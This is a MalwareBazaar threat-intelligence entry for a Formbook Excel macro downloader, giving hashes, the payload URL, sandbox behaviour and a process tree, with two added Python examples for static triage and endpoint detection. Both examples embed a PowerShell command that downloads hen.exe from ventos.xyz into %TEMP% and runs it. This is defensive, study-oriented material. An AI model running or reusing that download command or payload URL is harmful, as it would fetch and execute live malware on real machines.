MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Formbook


Vendor detections: 6



SHA256 hash: dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4
SHA3-384 hash: 8f1d3ab09ceb8e3b0cd2bad42ae1856824b1ef49512c6b1226f36f18879f79e139b055211e7854a55752d8494782dcc2
SHA1 hash: 90ef404e139164b266d553a5e094b01c0e810b4f
MD5 hash: d89a828241cd67ebdc96a905e5924f24
humanhash: sierra-bravo-april-winter
File name: PO-0715.xlsm
Signature: Formbook
File size: 94'837 bytes
First seen: 2020-07-19 09:40:52 UTC
Last seen: 2020-07-26 11:32:34 UTC
File type: Excel file xlsm
MIME type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep: 1536:I9Xdg7zjhJFdTI4uZNMNhC0br1j0EeewkHergIaYtaBQmxcC6VmIjYobFzM4yedA:SXi7z9JFtI2hC0bZUewkaANCzpzr2PUy
TLSH: 999302C9246AD813C3FE957C12AB4149E88A60FE50EA8B285D90736564E0FC74D5F4FE
Reporter: abuse_ch
Tags: FormBook xlsm
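The entry above identifies the sample by type (an OOXML xlsm) and by four digests. The following is an added example, not MalwareBazaar's code: a stand-alone static triage routine that confirms the file is an OOXML zip container, checks both the part list and the [Content_Types].xml manifest for a VBA project, pulls URLs and PowerShell indicators out of the VBA part, and computes the same digests the database lists. The xlsm it runs on is constructed inline (it is not the real PO-0715.xlsm); the macro text inside it is made up to mirror what the sandbox report describes (PowerShell fetching http://ventos.xyz/hen.exe into %TEMP% as putty.exe).

```python
import hashlib
import io
import re
import zipfile

XLSM_MAIN = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
XLSX_MAIN = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"
VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"


def build_sample_xlsm(with_macro: bool = True) -> bytes:
    """Constructed OOXML container standing in for PO-0715.xlsm (not the real file).

    With with_macro=True it declares a macro-enabled workbook and carries a fake
    xl/vbaProject.bin whose text mirrors what the sandbox report describes.
    """
    main_ct = XLSM_MAIN if with_macro else XLSX_MAIN
    ctypes = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        + ('<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
           if with_macro else "")
        + f'<Override PartName="/xl/workbook.xml" ContentType="{main_ct}"/></Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", ctypes)
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            # A real vbaProject.bin is an OLE2 compound file (D0 CF 11 E0 header) whose
            # module source is MS-OVBA-compressed; this stand-in stores the macro as plain text.
            z.writestr(
                "xl/vbaProject.bin",
                b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
                + b"Shell \"powershell -w hidden (New-Object Net.WebClient)"
                + b".DownloadFile('http://ventos.xyz/hen.exe', $env:TEMP + '\\putty.exe')\", 0",
            )
    return buf.getvalue()


def file_hashes(data: bytes) -> dict:
    """The four digests MalwareBazaar lists for every sample."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
    }


URL_RE = re.compile(rb"https?://[^\s'\"<>()]+", re.IGNORECASE)
PS_INDICATORS = (b"powershell", b"downloadfile", b"downloadstring", b"webclient",
                 b"invoke-expression", b"-w hidden", b"-enc", b"createobject")


def triage(data: bytes) -> dict:
    result = {"is_ooxml": False, "parts": [], "has_vba": False,
              "urls": [], "indicators": [], "verdict": "not-ooxml"}
    # OOXML is a zip container; the first local file header is 'PK\x03\x04'.
    if not data.startswith(b"PK\x03\x04") or not zipfile.is_zipfile(io.BytesIO(data)):
        return result
    result["is_ooxml"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        result["parts"] = names
        ctypes = z.read("[Content_Types].xml") if "[Content_Types].xml" in names else b""
        # Two independent signals for a macro project: the part is present, or the
        # manifest declares the content type (a renamed file still carries both).
        has_part = any(n.lower().endswith("vbaproject.bin") for n in names)
        result["has_vba"] = has_part or VBA_CONTENT_TYPE in ctypes
        for n in names:
            if n.lower().endswith("vbaproject.bin"):
                blob = z.read(n)
                result["urls"] = sorted({u.decode("latin-1") for u in URL_RE.findall(blob)})
                low = blob.lower()
                result["indicators"] = [i.decode() for i in PS_INDICATORS if i in low]
    if result["has_vba"] and (result["urls"] or result["indicators"]):
        result["verdict"] = "suspicious"
    elif result["has_vba"]:
        result["verdict"] = "macro-present"
    else:
        result["verdict"] = "no-macro"
    return result


if __name__ == "__main__":
    sample = build_sample_xlsm()
    print(file_hashes(sample))
    print(triage(sample))
```

The string scan only works on this constructed part because the macro is stored uncompressed; in a real vbaProject.bin the module source sits MS-OVBA-compressed inside an OLE2 stream, so "no URL found" from a raw search is inconclusive and the VBA should be decompressed first (oletools' olevba does this). The has_vba check, by contrast, holds for real files: the part name and the content-type declaration are both plain text in the zip.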


abuse_ch
Formbook payload URL:
http://ventos.xyz/hen.exe

Intelligence


File Origin
Uploads: 3
Downloads: 75
Origin country: n/a
Vendor Threat Intelligence
Result
Verdict: Malware
Maliciousness:

Behaviour
Creating a window
Unauthorized injection to a recently created process
Sending an HTTP GET request
Creating a file in the %temp% subdirectories
Reading critical registry keys
Creating a file
Deleting a recently created file
Reading Telegram data
Running batch commands
Creating a process with a hidden window
Launching a process
Sending a TCP request to an infection source
Stealing user critical data
Result
Threat name: FormBook
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Behaviour
Behavior Graph:
Behavior Graph ID: 247019   Sample: PO-0715.xlsm   Start date: 19/07/2020   Architecture: WINDOWS   Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 8 other signatures
Sample-level network contacts: cdn.onenote.net, www.heatingevansville.com

Process tree (reconstructed from the graph):
EXCEL.EXE
    dropped: C:\Users\user\Desktop\~$PO-0715.xlsm (data; Excel's own owner lock file, not a payload)
    signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell); Document exploit detected (process start blacklist hit)
    +-- powershell.exe
        network: ventos.xyz (185.125.230.195, ports 49739 and 80, IHOR-ASRU, Russian Federation)
        dropped: C:\Users\user\AppData\Local\Temp\putty.exe (PE32)
        signatures: Powershell drops PE file
        +-- putty.exe
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
            +-- putty.exe
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                +-- explorer.exe (injected)
                    network: www.starbaby-bohum.com
                    +-- help.exe
                        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                        +-- cmd.exe
                            +-- conhost.exe
        +-- conhost.exe
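The chain the sandbox graph shows (Excel spawning PowerShell, PowerShell writing a PE into %TEMP% and running it, the payload hollowing explorer.exe, and an injected system binary then starting cmd.exe) is what endpoint telemetry should catch before any Formbook-specific signature fires. The following is an added example, not code from MalwareBazaar or the sandbox vendor: four detection rules run over constructed process-creation and file-creation events in the shape Sysmon-style telemetry provides. The PIDs, paths and the PowerShell command line are constructed to match the graph; the page does not give the real command line. The NO_SHELL_PARENTS set holds only help.exe, the host the report shows; extending it is an assumption left to the reader.

```python
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# System binaries with no business spawning a shell; help.exe is the one the report
# shows Formbook living in. Assumption: extend this set from your own telemetry.
NO_SHELL_PARENTS = {"help.exe"}
TEMP_RE = re.compile(r"\\(appdata\\local\\temp|windows\\temp)\\", re.IGNORECASE)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: list) -> list:
    """Return alerts for the Office -> script host -> dropped PE -> injected host chain.

    Events are keyed by pid for brevity. Real telemetry should be keyed on ProcessGuid:
    PIDs are reused, and a stale ppid stitches unrelated processes into one lineage.
    """
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    alerts = []

    def ancestors(pid):
        # Walk parent links, nearest first; the seen-set guards against ppid loops.
        seen = set()
        p = procs.get(pid)
        while p is not None and p["pid"] not in seen:
            seen.add(p["pid"])
            yield p
            p = procs.get(p["ppid"])

    for e in events:
        if e["type"] == "process_create":
            img = base(e["image"])
            parent = procs.get(e["ppid"])
            pimg = base(parent["image"]) if parent else ""
            if pimg in OFFICE_APPS and img in SCRIPT_HOSTS:
                alerts.append({"rule": "office_spawns_script_host", "pid": e["pid"],
                               "detail": f"{pimg} -> {img} {e['cmdline']}"})
            if TEMP_RE.search(e["image"]) and any(
                    base(a["image"]) in OFFICE_APPS for a in ancestors(e["ppid"])):
                alerts.append({"rule": "office_lineage_runs_from_temp", "pid": e["pid"],
                               "detail": e["image"]})
            if pimg in NO_SHELL_PARENTS and img in SHELLS:
                alerts.append({"rule": "unexpected_child_shell", "pid": e["pid"],
                               "detail": f"{pimg} -> {img} {e['cmdline']}"})
        elif e["type"] == "file_create":
            writer = procs.get(e["pid"])
            if (writer and base(writer["image"]) in SCRIPT_HOSTS
                    and TEMP_RE.search(e["target"]) and e["target"].lower().endswith(".exe")):
                alerts.append({"rule": "script_host_drops_pe_in_temp", "pid": e["pid"],
                               "detail": e["target"]})
    return alerts


# Constructed events mirroring the sandbox graph (PIDs and command lines are made up).
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 50, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process_create", "pid": 100, "ppid": 50,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\user\Desktop\PO-0715.xlsm'},
    {"type": "process_create", "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
                "'http://ventos.xyz/hen.exe',$env:TEMP+'\\putty.exe')"},
    {"type": "file_create", "pid": 200, "target": r"C:\Users\user\AppData\Local\Temp\putty.exe"},
    {"type": "process_create", "pid": 300, "ppid": 200,
     "image": r"C:\Users\user\AppData\Local\Temp\putty.exe", "cmdline": "putty.exe"},
    {"type": "process_create", "pid": 301, "ppid": 300,
     "image": r"C:\Users\user\AppData\Local\Temp\putty.exe", "cmdline": "putty.exe"},
    # The payload hollows explorer.exe (pid 50); no process_create records the injection,
    # so the first visible sign is explorer.exe starting help.exe, which then runs cmd.exe.
    {"type": "process_create", "pid": 400, "ppid": 50,
     "image": r"C:\Windows\System32\help.exe", "cmdline": "help.exe"},
    {"type": "process_create", "pid": 500, "ppid": 400,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]

# Constructed benign baseline: a user opens a workbook and prints it.
BENIGN_EVENTS = [
    {"type": "process_create", "pid": 50, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process_create", "pid": 100, "ppid": 50,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" budget.xlsx'},
    {"type": "process_create", "pid": 110, "ppid": 100,
     "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The lineage rule is the one worth keeping even when the first hop is missed: a process running from %TEMP% with an Office application anywhere in its ancestry fires on both putty.exe instances regardless of what the PowerShell command line looked like. The injection itself leaves no process-creation event, which is why the last rule keys on the injected host's unexpected child rather than on the hollowing.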
Threat name: Script-Macro.Downloader.Obfuser
Status: Malicious
First seen: 2020-07-19 09:42:06 UTC
AV detection: 17 of 29 (58.62%)
Threat level: 3/5
Result
Malware family: n/a
Score: 10/10
Tags: n/a
Behaviour
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetThreadContext
Checks whether UAC is enabled
Loads dropped DLL
Blacklisted process makes network request
Executes dropped EXE
Blacklisted process makes network request
Executes dropped EXE
Process spawned unexpected child process
Process spawned unexpected child process
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those rules are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: SharedStrings
Author: Katie Kleemola
Description: Internal names found in LURK0/CCTV0 samples

A rule written for LURK0/CCTV0 internals matching an Excel-based Formbook downloader is an unexpected hit; check which strings it actually matched against the rule source before treating it as attribution evidence.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malware family: Formbook
Sample: Excel file xlsm dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4 (this sample)
Delivery method: Distributed via e-mail attachment (malspam)

Comments